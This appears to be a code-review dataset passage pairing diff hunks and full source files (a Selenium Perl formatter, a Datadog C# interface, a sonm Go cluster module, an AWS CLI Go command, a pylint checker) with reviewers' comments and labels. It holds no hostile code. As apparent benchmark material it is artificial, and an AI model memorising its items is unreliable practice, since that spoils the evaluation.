} RegexpNotMatch.prototype.toString = function() { return notOperator() + "(" + RegexpMatch.prototype.toString.call(this) + ")"; } function ifCondition(expression, callback) { return "if (" + expression.toString() + ") {\n" + callback() + "}"; } function pause(milliseconds) { return "sleep(" + (parseInt(milliseconds) / 1000) + ");"; } function echo(message) { return "print(" + xlateArgument(message) + ' . "\\n");' } function statement(expression) { if (!formatter.assertOrVerifyFailureOnNext) { formatter.tests++; expression.suffix = "_ok"; } return expression.toString() + ";"; } function array(value) { var str = '('; for (var i = 0; i < value.length; i++) { str += string(value[i]); if (i < value.length - 1) str += ", "; } str += ')'; return str; } function nonBreakingSpace() { return "\"\\x{00A0}\""; } CallSelenium.prototype.assertable = true; CallSelenium.prototype.toString = function() { var result = ''; if (this.negative) { result += '!'; } if (options.receiver) { result += options.receiver + '->'; } var command = underscore(this.message); if (this.noGet) { command = command.replace(/^get_/, ''); } result += command; if (this.suffix) { result += this.suffix; } result += '('; for (var i = 0; i < this.args.length; i++) { result += this.args[i]; if (i < this.args.length - 1) { result += ', '; } } result += ')'; return result; } function formatComment(comment) { return comment.comment.replace(/.+/mg, function(str) { return "# " + str; }); } this.options = { receiver: "$sel", rcHost: "localhost", rcPort: "4444", environment: "*chrome", header: 'use strict;\n' + 'use warnings;\n' + 'use Time::HiRes qw(sleep);\n' + 'use Test::WWW::Selenium;\n' + 'use Test::More "no_plan";\n' + 'use Test::Exception;\n' + '\n' + 'my ${receiver} = Test::WWW::Selenium->new( host => "${rcHost}", \n' + ' port => ${rcPort}, \n' + ' browser => "${environment}", \n' + ' browser_url => "${baseURL}" );\n' + '\n', footer: "", indent: "4", initialIndents: '0' }; this.configForm = '<description>Variable for Selenium instance</description>' + '<textbox id="options_receiver" />' + '<description>Selenium RC host</description>' + '<textbox id="options_rcHost" />' + '<description>Selenium RC port</description>' + '<textbox id="options_rcPort" />' + '<description>Environment</description>' + '<textbox id="options_environment" />' + '<description>Header</description>' + '<textbox id="options_header" multiline="true" flex="1" rows="4"/>' + '<description>Footer</description>' + '<textbox id="options_footer" multiline="true" flex="1" rows="4"/>' + '<description>Indent</description>' + '<menulist id="options_indent"><menupopup>' + '<menuitem label="Tab" value="tab"/>' + '<menuitem label="1 space" value="1"/>' + '<menuitem label="2 spaces" value="2"/>' + '<menuitem label="3 spaces" value="3"/>' + '<menuitem label="4 spaces" value="4"/>' + '<menuitem label="5 spaces" value="5"/>' + '<menuitem label="6 spaces" value="6"/>' + '<menuitem label="7 spaces" value="7"/>' + '<menuitem label="8 spaces" value="8"/>' + '</menupopup></menulist>';
1
10,815
Why is the escaping of @ and $ removed?
SeleniumHQ-selenium
rb
@@ -0,0 +1,7 @@ +namespace Datadog.Trace.ClrProfiler.Interfaces +{ + internal interface IHasHttpUrl + { + string GetRawUrl(); + } +}
1
1
14,649
Nit: `Http` is redundant in this interface's name.
DataDog-dd-trace-dotnet
.cs
@@ -82,6 +82,19 @@ func NewCluster(ctx context.Context, cfg *ClusterConfig, creds credentials.Trans if err != nil { return nil, nil, err } + + exists, err := store.Exists(cfg.SynchronizableEntitiesPrefix) + if err != nil { + return nil, nil, fmt.Errorf("failed to check if SynchronizableEntitiesPrefix exists: %s", err) + } + + if !exists { + err = store.Put(cfg.SynchronizableEntitiesPrefix, []byte{}, nil) + if err != nil { + return nil, nil, err + } + } + endpoints, err := parseEndpoints(cfg) if err != nil { return nil, nil, err
1
package hub import ( "bytes" "context" "crypto/tls" "encoding/json" "fmt" "net" "reflect" "strings" "sync" "time" "github.com/docker/leadership" "github.com/docker/libkv" "github.com/docker/libkv/store" "github.com/docker/libkv/store/boltdb" "github.com/docker/libkv/store/consul" log "github.com/noxiouz/zapctx/ctxlog" "github.com/pkg/errors" "github.com/satori/uuid" pb "github.com/sonm-io/core/proto" "github.com/sonm-io/core/util" "go.uber.org/zap" "golang.org/x/sync/errgroup" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) // ClusterEvent describes an event that can produce the cluster. // // Possible types are: // - `NewMemberEvent` when new member joins cluster // - `LeadershipEvent` when leadership is transferred // - `T` types for other registered synchronizable entities. // - `error` on any unrecoverable error, after that channel is closed // and the user should call Run once more to enable synchronization type ClusterEvent interface{} // Specific type of cluster event emited when new member joins cluster type NewMemberEvent struct { Id string endpoints []string } // Specific type of cluster event emited when leadership is transferred. // It is not always loss or aquire of leadership of this specific node type LeadershipEvent struct { Held bool LeaderId string LeaderEndpoints []string } type Cluster interface { // Starts synchronization process. Can be called multiple times after error is received in EventChannel Run() error Close() // IsLeader returns true if this cluster is a leader, i.e. we rule the // synchronization process. IsLeader() bool LeaderClient() (pb.HubClient, error) RegisterAndLoadEntity(name string, prototype interface{}) error Synchronize(entity interface{}) error // Fetch current cluster members Members() ([]NewMemberEvent, error) } // Returns a cluster writer interface if this node is a master, event channel // otherwise. // Should be recalled when a cluster's master/slave state changes. // The channel is closed when the specified context is canceled. func NewCluster(ctx context.Context, cfg *ClusterConfig, creds credentials.TransportCredentials) (Cluster, <-chan ClusterEvent, error) { store, err := makeStore(ctx, cfg) if err != nil { return nil, nil, err } endpoints, err := parseEndpoints(cfg) if err != nil { return nil, nil, err } c := cluster{ parentCtx: ctx, cfg: cfg, registeredEntities: make(map[string]reflect.Type), entityNames: make(map[reflect.Type]string), store: store, isLeader: true, id: uuid.NewV1().String(), endpoints: endpoints, clients: make(map[string]*client), clusterEndpoints: make(map[string][]string), eventChannel: make(chan ClusterEvent, 100), creds: creds, } if cfg.Failover { c.isLeader = false } c.ctx, c.cancel = context.WithCancel(c.parentCtx) c.registerMember(c.id, c.endpoints) return &c, c.eventChannel, nil } type client struct { client pb.HubClient conn *grpc.ClientConn } type cluster struct { parentCtx context.Context ctx context.Context cancel context.CancelFunc cfg *ClusterConfig registeredEntitiesMu sync.RWMutex registeredEntities map[string]reflect.Type entityNames map[reflect.Type]string store store.Store // self info isLeader bool id string endpoints []string leaderLock sync.RWMutex clients map[string]*client clusterEndpoints map[string][]string leaderId string eventChannel chan ClusterEvent creds credentials.TransportCredentials } func (c *cluster) Close() { if c.cancel != nil { c.cancel() } } func (c *cluster) Run() error { c.Close() w := errgroup.Group{} c.ctx, c.cancel = context.WithCancel(c.parentCtx) if c.cfg.Failover { c.isLeader = false w.Go(c.election) w.Go(c.leaderWatch) w.Go(c.announce) w.Go(c.hubWatch) w.Go(c.hubGC) } else { log.G(c.ctx).Info("runnning in dev single-server mode") } w.Go(c.watchEvents) return w.Wait() } func (c *cluster) IsLeader() bool { return c.isLeader } // Get GRPC hub client to current leader func (c *cluster) LeaderClient() (pb.HubClient, error) { log.G(c.ctx).Debug("fetching leader client") c.leaderLock.RLock() defer c.leaderLock.RUnlock() leaderEndpoints, ok := c.clusterEndpoints[c.leaderId] if !ok || len(leaderEndpoints) == 0 { log.G(c.ctx).Warn("can not determine leader") return nil, errors.New("can not determine leader") } client, ok := c.clients[c.leaderId] if !ok || client == nil { log.G(c.ctx).Warn("not connected to leader") return nil, errors.New("not connected to leader") } return client.client, nil } func (c *cluster) RegisterAndLoadEntity(name string, prototype interface{}) error { c.registeredEntitiesMu.Lock() defer c.registeredEntitiesMu.Unlock() t := reflect.Indirect(reflect.ValueOf(prototype)).Type() c.registeredEntities[name] = t c.entityNames[t] = name keyName := c.cfg.SynchronizableEntitiesPrefix + "/" + name exists, err := c.store.Exists(keyName) if err != nil { return errors.Wrap(err, fmt.Sprintf("could not check entity %s for existance in storage", name)) } if !exists { return nil } kvPair, err := c.store.Get(keyName) if err != nil { return errors.Wrap(err, fmt.Sprintf("could not fetch entity %s initial value from storage", name)) } err = json.Unmarshal(kvPair.Value, prototype) if err != nil { return errors.Wrap(err, fmt.Sprintf("could not unmarshal entity %s from storage data", name)) } return nil } func (c *cluster) Synchronize(entity interface{}) error { if !c.isLeader { log.G(c.ctx).Warn("failed to synchronize entity - not a leader") return errors.New("not a leader") } name, err := c.nameByEntity(entity) if err != nil { log.G(c.ctx).Warn("unknown synchronizable entity", zap.Any("entity", entity)) return err } data, err := json.Marshal(entity) if err != nil { log.G(c.ctx).Warn("could not marshal entity", zap.Error(err)) return err } log.G(c.ctx).Debug("synchronizing entity", zap.Any("entity", entity), zap.ByteString("marshalled", data)) c.store.Put(c.cfg.SynchronizableEntitiesPrefix+"/"+name, data, &store.WriteOptions{}) return nil } func (c *cluster) Members() ([]NewMemberEvent, error) { result := make([]NewMemberEvent, 0) c.leaderLock.RLock() defer c.leaderLock.RUnlock() for id, endpoints := range c.clusterEndpoints { result = append(result, NewMemberEvent{id, endpoints}) } return result, nil } func (c *cluster) election() error { candidate := leadership.NewCandidate(c.store, c.cfg.LeaderKey, c.id, makeDuration(c.cfg.LeaderTTL)) electedCh, errCh := candidate.RunForElection() log.G(c.ctx).Info("starting leader election goroutine") for { select { case c.isLeader = <-electedCh: log.G(c.ctx).Debug("election event", zap.Bool("isLeader", c.isLeader)) // Do not possibly block on event channel to prevent stale leadership data go c.emitLeadershipEvent() case err := <-errCh: log.G(c.ctx).Error("election failure", zap.Error(err)) c.close(errors.WithStack(err)) return err case <-c.ctx.Done(): candidate.Stop() return nil } } } // Blocks in endless cycle watching for leadership. // When the leadership is changed stores new leader id in cluster func (c *cluster) leaderWatch() error { log.G(c.ctx).Info("starting leader watch goroutine") follower := leadership.NewFollower(c.store, c.cfg.LeaderKey) leaderCh, errCh := follower.FollowElection() for { select { case <-c.ctx.Done(): follower.Stop() return nil case err := <-errCh: log.G(c.ctx).Error("leader watch failure", zap.Error(err)) c.close(errors.WithStack(err)) return err case leaderId := <-leaderCh: c.leaderLock.Lock() c.leaderId = leaderId c.leaderLock.Unlock() c.emitLeadershipEvent() } } } func (c *cluster) announce() error { log.G(c.ctx).Info("starting announce goroutine", zap.Any("endpoints", c.endpoints), zap.String("ID", c.id)) endpointsData, _ := json.Marshal(c.endpoints) ticker := time.NewTicker(makeDuration(c.cfg.AnnounceTTL)) defer ticker.Stop() for { select { case <-ticker.C: err := c.store.Put(c.cfg.MemberListKey+"/"+c.id, endpointsData, &store.WriteOptions{TTL: makeDuration(c.cfg.AnnounceTTL)}) if err != nil { log.G(c.ctx).Error("could not update announce", zap.Error(err)) c.close(errors.WithStack(err)) return err } case <-c.ctx.Done(): return nil } } } func (c *cluster) hubWatch() error { log.G(c.ctx).Info("starting member watch goroutine") stopCh := make(chan struct{}) listener, err := c.store.WatchTree(c.cfg.MemberListKey, stopCh) if err != nil { c.close(err) } for { select { case members, ok := <-listener: if !ok { err := errors.WithStack(errors.New("hub watcher closed")) c.close(err) return err } else { for _, member := range members { if member.Value == nil { log.G(c.ctx).Debug("received cluster member with nil Value, skipping (this can happen due to consul peculiarities)", zap.Any("member", member)) continue } else { log.G(c.ctx).Debug("received cluster member, registering", zap.Any("member", member)) } err := c.registerMemberFromKV(member) if err != nil { log.G(c.ctx).Warn("trash data in cluster members folder: ", zap.Any("kvPair", member), zap.Error(err)) } } } case <-c.ctx.Done(): close(stopCh) return nil } } } func (c *cluster) checkHub(id string) error { if id == c.id { return nil } exists, err := c.store.Exists(c.cfg.MemberListKey + "/" + id) if err != nil { return err } if !exists { log.G(c.ctx).Info("hub is offline, removing", zap.String("hubId", id)) c.leaderLock.Lock() defer c.leaderLock.Unlock() cli, ok := c.clients[id] if ok { cli.conn.Close() delete(c.clients, id) } } return nil } func (c *cluster) hubGC() error { log.G(c.ctx).Info("starting hub GC goroutine") t := time.NewTicker(makeDuration(c.cfg.MemberGCPeriod)) defer t.Stop() for { select { case <-t.C: c.leaderLock.RLock() idsToCheck := make([]string, 0) for id := range c.clients { idsToCheck = append(idsToCheck, id) } c.leaderLock.RUnlock() for _, id := range idsToCheck { err := c.checkHub(id) if err != nil { log.G(c.ctx).Warn("failed to check hub", zap.String("hubId", id), zap.Error(err)) } else { log.G(c.ctx).Info("checked hub", zap.String("hubId", id)) } } case <-c.ctx.Done(): return nil } } } //TODO: extract this to some kind of store wrapper over boltdb func (c *cluster) watchEventsTree(stopCh <-chan struct{}) (<-chan []*store.KVPair, error) { if c.cfg.Failover { return c.store.WatchTree(c.cfg.SynchronizableEntitiesPrefix, stopCh) } opts := store.WriteOptions{ IsDir: true, } empty := make([]byte, 0) c.store.Put(c.cfg.SynchronizableEntitiesPrefix, empty, &opts) ch := make(chan []*store.KVPair, 1) data := make(map[string]*store.KVPair) updater := func() error { changed := false pairs, err := c.store.List(c.cfg.SynchronizableEntitiesPrefix) if err != nil { return err } filteredPairs := make([]*store.KVPair, 0) for _, pair := range pairs { if pair.Key == c.cfg.SynchronizableEntitiesPrefix { continue } filteredPairs = append(filteredPairs, pair) cur, ok := data[pair.Key] if !ok || !bytes.Equal(cur.Value, pair.Value) { changed = true data[pair.Key] = pair } } if changed { ch <- filteredPairs } return nil } if err := updater(); err != nil { return nil, err } go func() { t := time.NewTicker(time.Second * 1) defer t.Stop() for { select { case <-c.ctx.Done(): return case <-t.C: err := updater() if err != nil { c.close(err) } } } }() return ch, nil } func (c *cluster) watchEvents() error { log.G(c.ctx).Info("subscribing on sync folder") watchStopChannel := make(chan struct{}) ch, err := c.watchEventsTree(watchStopChannel) if err != nil { c.close(err) return err } for { select { case <-c.ctx.Done(): close(watchStopChannel) return nil case kvList, ok := <-ch: if !ok { err := errors.WithStack(errors.New("watch channel is closed")) c.close(err) return err } for _, kv := range kvList { name := fetchNameFromPath(kv.Key) t, err := c.typeByName(name) if err != nil { log.G(c.ctx).Warn("unknown synchronizable entity", zap.String("entity", name)) continue } value := reflect.New(t) err = json.Unmarshal(kv.Value, value.Interface()) if err != nil { log.G(c.ctx).Warn("can not unmarshal entity", zap.Error(err)) } else { log.G(c.ctx).Debug("received cluster event", zap.String("name", name), zap.Any("value", value.Interface())) c.eventChannel <- reflect.Indirect(value).Interface() } } } } } func (c *cluster) nameByEntity(entity interface{}) (string, error) { c.registeredEntitiesMu.RLock() defer c.registeredEntitiesMu.RUnlock() t := reflect.TypeOf(entity) name, ok := c.entityNames[t] if !ok { return "", errors.New("entity " + t.String() + " is not registered") } return name, nil } func (c *cluster) typeByName(name string) (reflect.Type, error) { c.registeredEntitiesMu.RLock() defer c.registeredEntitiesMu.RUnlock() t, ok := c.registeredEntities[name] if !ok { return nil, errors.New("entity " + name + " is not registered") } return t, nil } func makeStore(ctx context.Context, cfg *ClusterConfig) (store.Store, error) { consul.Register() boltdb.Register() log.G(ctx).Info("creating store", zap.Any("store", cfg)) endpoints := []string{cfg.Store.Endpoint} backend := store.Backend(cfg.Store.Type) var tlsConf *tls.Config if len(cfg.Store.CertFile) != 0 && len(cfg.Store.KeyFile) != 0 { cer, err := tls.LoadX509KeyPair(cfg.Store.CertFile, cfg.Store.KeyFile) if err != nil { return nil, err } tlsConf = &tls.Config{ Certificates: []tls.Certificate{cer}, } } config := store.Config{ TLS: tlsConf, } config.Bucket = cfg.Store.Bucket return libkv.NewStore(backend, endpoints, &config) } func (c *cluster) close(err error) { log.G(c.ctx).Error("cluster failure", zap.Error(err)) c.leaderLock.Lock() c.leaderId = "" c.isLeader = false c.leaderLock.Unlock() c.Close() } func (c *cluster) emitLeadershipEvent() { c.leaderLock.Lock() defer c.leaderLock.Unlock() endpoints, _ := c.clusterEndpoints[c.leaderId] c.eventChannel <- LeadershipEvent{ Held: c.isLeader, LeaderId: c.leaderId, LeaderEndpoints: endpoints, } } func (c *cluster) memberExists(id string) bool { c.leaderLock.RLock() defer c.leaderLock.RUnlock() _, ok := c.clients[id] return ok } func (c *cluster) registerMemberFromKV(member *store.KVPair) error { id := fetchNameFromPath(member.Key) if id == c.id { return nil } if c.memberExists(id) { return nil } endpoints := make([]string, 0) err := json.Unmarshal(member.Value, &endpoints) if err != nil { return err } return c.registerMember(id, endpoints) } func (c *cluster) registerMember(id string, endpoints []string) error { log.G(c.ctx).Info("fetched endpoints of new member", zap.Any("endpoints", endpoints)) c.leaderLock.Lock() c.clusterEndpoints[id] = endpoints c.eventChannel <- NewMemberEvent{id, endpoints} c.leaderLock.Unlock() if id == c.id { return nil } for _, ep := range endpoints { conn, err := util.MakeGrpcClient(c.ctx, ep, c.creds, grpc.WithBlock(), grpc.WithTimeout(time.Second*5)) if err != nil { log.G(c.ctx).Warn("could not connect to hub", zap.String("endpoint", ep), zap.Error(err)) continue } else { log.G(c.ctx).Info("successfully connected to cluster member") c.leaderLock.Lock() defer c.leaderLock.Unlock() _, ok := c.clients[id] if ok { log.G(c.ctx).Info("duplicated connection - dropping") conn.Close() return nil } c.clients[id] = &client{pb.NewHubClient(conn), conn} return nil } } return errors.New("could not connect to any provided member endpoint") } func fetchNameFromPath(key string) string { parts := strings.Split(key, "/") return parts[len(parts)-1] } func makeDuration(numSeconds uint64) time.Duration { return time.Second * time.Duration(numSeconds) } func parseEndpoints(config *ClusterConfig) ([]string, error) { endpoints := make([]string, 0) host, port, err := net.SplitHostPort(config.Endpoint) if len(host) != 0 { endpoints = append(endpoints, config.Endpoint) return endpoints, nil } systemIPs, err := util.GetAvailableIPs() if err != nil { return nil, err } for _, ip := range systemIPs { if ip4 := ip.To4(); ip4 != nil { endpoints = append(endpoints, ip4.String()+":"+port) } else { endpoints = append(endpoints, "["+ip.String()+"]:"+port) } } return endpoints, nil }
1
5,999
what if I set SynchronizableEntitiesPrefix to "a/b/c/d" in config?
sonm-io-core
go
@@ -83,9 +83,13 @@ func (opts *InitAppOpts) Validate() error { } } if opts.DockerfilePath != "" { - if _, err := listDockerfiles(opts.fs, opts.DockerfilePath); err != nil { + isDir, err := afero.IsDir(opts.fs, opts.DockerfilePath) + if err != nil { return err } + if isDir { + return fmt.Errorf("dockerfile path expected, got %s", opts.DockerfilePath) + } } if opts.ProjectName() == "" { return errNoProjectInWorkspace
1
// Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. // SPDX-License-Identifier: Apache-2.0 package cli import ( "errors" "fmt" "os" "path/filepath" "strings" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/archer" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/aws/session" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/deploy/cloudformation" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/manifest" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/store" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/term/color" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/term/log" termprogress "github.com/aws/amazon-ecs-cli-v2/internal/pkg/term/progress" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/workspace" "github.com/spf13/afero" "github.com/spf13/cobra" ) const ( fmtAddAppToProjectStart = "Creating ECR repositories for application %s." fmtAddAppToProjectFailed = "Failed to create ECR repositories for application %s." fmtAddAppToProjectComplete = "Created ECR repositories for application %s." ) // InitAppOpts holds the configuration needed to create a new application. type InitAppOpts struct { // Fields with matching flags. AppType string AppName string DockerfilePath string // Interfaces to interact with dependencies. fs afero.Fs manifestWriter archer.ManifestIO appStore archer.ApplicationStore projGetter archer.ProjectGetter projDeployer projectDeployer prog progress // Outputs stored on successful actions. manifestPath string *GlobalOpts } // Ask prompts for fields that are required but not passed in. func (opts *InitAppOpts) Ask() error { if opts.AppType == "" { if err := opts.askAppType(); err != nil { return err } } if opts.AppName == "" { if err := opts.askAppName(); err != nil { return err } } if opts.DockerfilePath == "" { if err := opts.askDockerfile(); err != nil { return err } } return nil } // Validate returns an error if the flag values passed by the user are invalid. func (opts *InitAppOpts) Validate() error { if opts.AppType != "" { if err := validateApplicationType(opts.AppType); err != nil { return err } } if opts.AppName != "" { if err := validateApplicationName(opts.AppName); err != nil { return err } } if opts.DockerfilePath != "" { if _, err := listDockerfiles(opts.fs, opts.DockerfilePath); err != nil { return err } } if opts.ProjectName() == "" { return errNoProjectInWorkspace } return nil } // Execute writes the application's manifest file and stores the application in SSM. func (opts *InitAppOpts) Execute() error { if err := opts.ensureNoExistingApp(opts.ProjectName(), opts.AppName); err != nil { return err } manifestPath, err := opts.createManifest() if err != nil { return err } opts.manifestPath = manifestPath log.Infoln() log.Successf("Wrote the manifest for %s app at '%s'\n", color.HighlightUserInput(opts.AppName), color.HighlightResource(opts.manifestPath)) log.Infoln("Your manifest contains configurations like your container size and ports.") log.Infoln() proj, err := opts.projGetter.GetProject(opts.ProjectName()) if err != nil { return fmt.Errorf("get project %s: %w", opts.ProjectName(), err) } opts.prog.Start(fmt.Sprintf(fmtAddAppToProjectStart, opts.AppName)) if err := opts.projDeployer.AddAppToProject(proj, opts.AppName); err != nil { opts.prog.Stop(log.Serrorf(fmtAddAppToProjectFailed, opts.AppName)) return fmt.Errorf("add app %s to project %s: %w", opts.AppName, opts.ProjectName(), err) } opts.prog.Stop(log.Ssuccessf(fmtAddAppToProjectComplete, opts.AppName)) return opts.createAppInProject(opts.ProjectName()) } func (opts *InitAppOpts) createManifest() (string, error) { manifest, err := manifest.CreateApp(opts.AppName, opts.AppType, opts.DockerfilePath) if err != nil { return "", fmt.Errorf("generate a manifest: %w", err) } manifestBytes, err := manifest.Marshal() if err != nil { return "", fmt.Errorf("marshal manifest: %w", err) } filename := opts.manifestWriter.AppManifestFileName(opts.AppName) manifestPath, err := opts.manifestWriter.WriteFile(manifestBytes, filename) if err != nil { return "", fmt.Errorf("write manifest for app %s: %w", opts.AppName, err) } wkdir, err := os.Getwd() if err != nil { return "", fmt.Errorf("get working directory: %w", err) } relPath, err := filepath.Rel(wkdir, manifestPath) if err != nil { return "", fmt.Errorf("relative path of manifest file: %w", err) } return relPath, nil } func (opts *InitAppOpts) createAppInProject(projectName string) error { if err := opts.appStore.CreateApplication(&archer.Application{ Project: projectName, Name: opts.AppName, Type: opts.AppType, }); err != nil { return fmt.Errorf("saving application %s: %w", opts.AppName, err) } return nil } func (opts *InitAppOpts) askAppType() error { t, err := opts.prompt.SelectOne( "Which type of infrastructure pattern best represents your application?", `Your application's architecture. Most applications need additional AWS resources to run. To help setup the infrastructure resources, select what "kind" or "type" of application you want to build.`, manifest.AppTypes) if err != nil { return fmt.Errorf("failed to get type selection: %w", err) } opts.AppType = t return nil } func (opts *InitAppOpts) askAppName() error { name, err := opts.prompt.Get( fmt.Sprintf("What do you want to call this %s?", opts.AppType), fmt.Sprintf(`The name will uniquely identify this application within your %s project. Deployed resources (such as your service, logs) will contain this app's name and be tagged with it.`, opts.ProjectName()), validateApplicationName) if err != nil { return fmt.Errorf("failed to get application name: %w", err) } opts.AppName = name return nil } // askDockerfile prompts for the Dockerfile by looking at sub-directories with a Dockerfile. // If the user chooses to enter a custom path, then we prompt them for the path. func (opts *InitAppOpts) askDockerfile() error { // TODO https://github.com/aws/amazon-ecs-cli-v2/issues/206 dockerfiles, err := listDockerfiles(opts.fs, ".") if err != nil { return err } sel, err := opts.prompt.SelectOne( fmt.Sprintf("Which Dockerfile would you like to use for %s app?", opts.AppName), "Dockerfile to use for building your application's container image.", dockerfiles, ) if err != nil { return fmt.Errorf("failed to select Dockerfile: %w", err) } // NOTE: Trim "/Dockerfile" from the selected option for storing in the app manifest. opts.DockerfilePath = strings.TrimSuffix(sel, "/Dockerfile") return nil } func (opts *InitAppOpts) ensureNoExistingApp(projectName, appName string) error { _, err := opts.appStore.GetApplication(projectName, opts.AppName) // If the app doesn't exist - that's perfect, return no error. var existsErr *store.ErrNoSuchApplication if errors.As(err, &existsErr) { return nil } // If there's no error, that means we were able to fetch an existing app if err == nil { return fmt.Errorf("application %s already exists under project %s", appName, projectName) } // Otherwise, there was an error calling the store return fmt.Errorf("couldn't check if application %s exists in project %s: %w", appName, projectName, err) } // RecommendedActions returns follow-up actions the user can take after successfully executing the command. func (opts *InitAppOpts) RecommendedActions() []string { return []string{ fmt.Sprintf("Update your manifest %s to change the defaults.", color.HighlightResource(opts.manifestPath)), fmt.Sprintf("Run %s to deploy your application to a %s environment.", color.HighlightCode(fmt.Sprintf("ecs-preview app deploy --name %s --env %s", opts.AppName, defaultEnvironmentName)), defaultEnvironmentName), } } // BuildAppInitCmd build the command for creating a new application. func BuildAppInitCmd() *cobra.Command { opts := &InitAppOpts{ GlobalOpts: NewGlobalOpts(), } cmd := &cobra.Command{ Use: "init", Short: "Creates a new application in a project.", Long: `Creates a new application in a project. This command is also run as part of "ecs-preview init".`, Example: ` Create a "frontend" web application. /code $ ecs-preview app init --name frontend --app-type "Load Balanced Web App" --dockerfile ./frontend/Dockerfile`, PreRunE: runCmdE(func(cmd *cobra.Command, args []string) error { opts.fs = &afero.Afero{Fs: afero.NewOsFs()} store, err := store.New() if err != nil { return fmt.Errorf("couldn't connect to project datastore: %w", err) } opts.appStore = store opts.projGetter = store ws, err := workspace.New() if err != nil { return fmt.Errorf("workspace cannot be created: %w", err) } opts.manifestWriter = ws sess, err := session.Default() if err != nil { return err } opts.projDeployer = cloudformation.New(sess) opts.prog = termprogress.NewSpinner() return opts.Validate() }), RunE: runCmdE(func(cmd *cobra.Command, args []string) error { log.Warningln("It's best to run this command in the root of your workspace.") if err := opts.Ask(); err != nil { return err } if err := opts.Validate(); err != nil { // validate flags return err } return opts.Execute() }), PostRunE: func(cmd *cobra.Command, args []string) error { log.Infoln("Recommended follow-up actions:") for _, followup := range opts.RecommendedActions() { log.Infof("- %s\n", followup) } return nil }, } cmd.Flags().StringVarP(&opts.AppType, appTypeFlag, appTypeFlagShort, "" /* default */, appTypeFlagDescription) cmd.Flags().StringVarP(&opts.AppName, nameFlag, nameFlagShort, "" /* default */, appFlagDescription) cmd.Flags().StringVarP(&opts.DockerfilePath, dockerFileFlag, dockerFileFlagShort, "" /* default */, dockerFileFlagDescription) return cmd }
1
11,495
nit: This error message doesn't mention that the path is a directory, maybe "Dockerfile path is a directory:%s, please provide path to file."
aws-copilot-cli
go
@@ -26,6 +26,7 @@ # Copyright (c) 2020 Anthony <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 Peter Kolbus <[email protected]> +# Copyright (c) 2021 Daniel van Noord <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
1
# Copyright (c) 2009-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2010 Daniel Harding <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2013-2020 Claudiu Popa <[email protected]> # Copyright (c) 2014 Brett Cannon <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Rene Zhang <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016, 2018 Jakub Wilk <[email protected]> # Copyright (c) 2016 Peter Dawyndt <[email protected]> # Copyright (c) 2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2017 Ville Skyttä <[email protected]> # Copyright (c) 2018, 2020 Anthony Sottile <[email protected]> # Copyright (c) 2018-2019 Lucas Cimon <[email protected]> # Copyright (c) 2018 Alan Chan <[email protected]> # Copyright (c) 2018 Yury Gribov <[email protected]> # Copyright (c) 2018 ssolanki <[email protected]> # Copyright (c) 2018 Nick Drozd <[email protected]> # Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]> # Copyright (c) 2019 Wes Turner <[email protected]> # Copyright (c) 2019 Djailla <[email protected]> # Copyright (c) 2019 Hugo van Kemenade <[email protected]> # Copyright (c) 2020 Matthew Suozzo <[email protected]> # Copyright (c) 2020 hippo91 <[email protected]> # Copyright (c) 2020 谭九鼎 <[email protected]> # Copyright (c) 2020 Anthony <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 Peter Kolbus <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/main/LICENSE """Checker for string formatting operations. """ import collections import numbers import re import tokenize from typing import TYPE_CHECKING, Iterable import astroid from pylint.checkers import BaseChecker, BaseTokenChecker, utils from pylint.checkers.utils import check_messages from pylint.constants import BUILTINS from pylint.interfaces import IAstroidChecker, IRawChecker, ITokenChecker if TYPE_CHECKING: from typing import Counter # typing.Counter added in Python 3.6.1 _AST_NODE_STR_TYPES = ("__builtin__.unicode", "__builtin__.str", "builtins.str") # Prefixes for both strings and bytes literals per # https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals _PREFIXES = { "r", "u", "R", "U", "f", "F", "fr", "Fr", "fR", "FR", "rf", "rF", "Rf", "RF", "b", "B", "br", "Br", "bR", "BR", "rb", "rB", "Rb", "RB", } SINGLE_QUOTED_REGEX = re.compile("(%s)?'''" % "|".join(_PREFIXES)) DOUBLE_QUOTED_REGEX = re.compile('(%s)?"""' % "|".join(_PREFIXES)) QUOTE_DELIMITER_REGEX = re.compile("(%s)?(\"|')" % "|".join(_PREFIXES), re.DOTALL) MSGS = { # pylint: disable=consider-using-namedtuple-or-dataclass "E1300": ( "Unsupported format character %r (%#02x) at index %d", "bad-format-character", "Used when an unsupported format character is used in a format string.", ), "E1301": ( "Format string ends in middle of conversion specifier", "truncated-format-string", "Used when a format string terminates before the end of a " "conversion specifier.", ), "E1302": ( "Mixing named and unnamed conversion specifiers in format string", "mixed-format-string", "Used when a format string contains both named (e.g. '%(foo)d') " "and unnamed (e.g. '%d') conversion specifiers. This is also " "used when a named conversion specifier contains * for the " "minimum field width and/or precision.", ), "E1303": ( "Expected mapping for format string, not %s", "format-needs-mapping", "Used when a format string that uses named conversion specifiers " "is used with an argument that is not a mapping.", ), "W1300": ( "Format string dictionary key should be a string, not %s", "bad-format-string-key", "Used when a format string that uses named conversion specifiers " "is used with a dictionary whose keys are not all strings.", ), "W1301": ( "Unused key %r in format string dictionary", "unused-format-string-key", "Used when a format string that uses named conversion specifiers " "is used with a dictionary that contains keys not required by the " "format string.", ), "E1304": ( "Missing key %r in format string dictionary", "missing-format-string-key", "Used when a format string that uses named conversion 